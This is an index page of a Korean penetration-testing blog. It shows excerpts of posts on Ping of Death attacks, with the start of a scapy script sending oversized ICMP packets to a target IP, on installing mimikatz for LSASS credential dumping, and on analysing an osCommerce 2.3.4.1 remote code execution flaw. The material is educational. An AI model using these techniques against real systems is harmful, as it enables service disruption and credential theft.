목록전체 글 (420)

외로운 Nova의 작업실

네트워크 공격 기법

- 서비스 거부 공격 Ping 명령을 통해 TCMP를 정상적인크기 보다 아주 크게 만들어 전송하면 MTU에의해 다수의 IP 단편화가 발생하게되는데, 이 단편화를 타겟은 재조합해야합니다. 이때 많은 부하가 발생하거나 재조합 버퍼의 오버플로우가 발생하여 정상적인 서비스를 하지 못하도록 합니다. 아래는 Ping Of Death Attack의 파이썬 코드입니다. from scapy.all import * # Define the IP address of the target target_ip = "192.168.1.1" # Create an ICMP packet with the maximum payload size max_size = 65535 icmp_packet = IP(dst=target_ip)/ICMP()/..
Server Penetesting/Network 2023. 4. 6. 17:06
mimikatz - 1(설치 및 LSASS 메모리 덤프, hash-the-pass)

- 설치 https://github.com/ParrotSec/mimikatz GitHub - ParrotSec/mimikatz Contribute to ParrotSec/mimikatz development by creating an account on GitHub. github.com 위 사이트로 들어가서 다운로드하면됩니다. - 개요 Mimikatz는 사용자가 메모리 또는 Windows 운영 체제에서 암호, 해시 및 Kerberos 티켓과 같은 인증 자격 증명을 추출할 수 있는 악용 후 도구입니다. 원래 Windows 운영 체제의 보안 취약점을 입증하기 위한 개념 증명 도구로 개발되었지만 현재는 공격자와 보안 전문가 모두가 보안 평가 및 침투 테스트를 수행하는 데 일반적으로 사용됩니다. Mimikatz..
Server Penetesting/Hacking Tool 2023. 4. 4. 18:16
osCommerce 2.3.4.1 - Remote Code Execution 3(취약점 원인 분석)

- 취약점의 원인 분석 원인은 Apache24\htdocs\oscommerce\catalog\install\templates\pages\install_4.php 파일에서 나타납니다.
Server Penetesting/Exploit-db 2023. 4. 3. 17:12
Prev 1 ··· 51 52 53 54 55 56 57 ··· 140 Next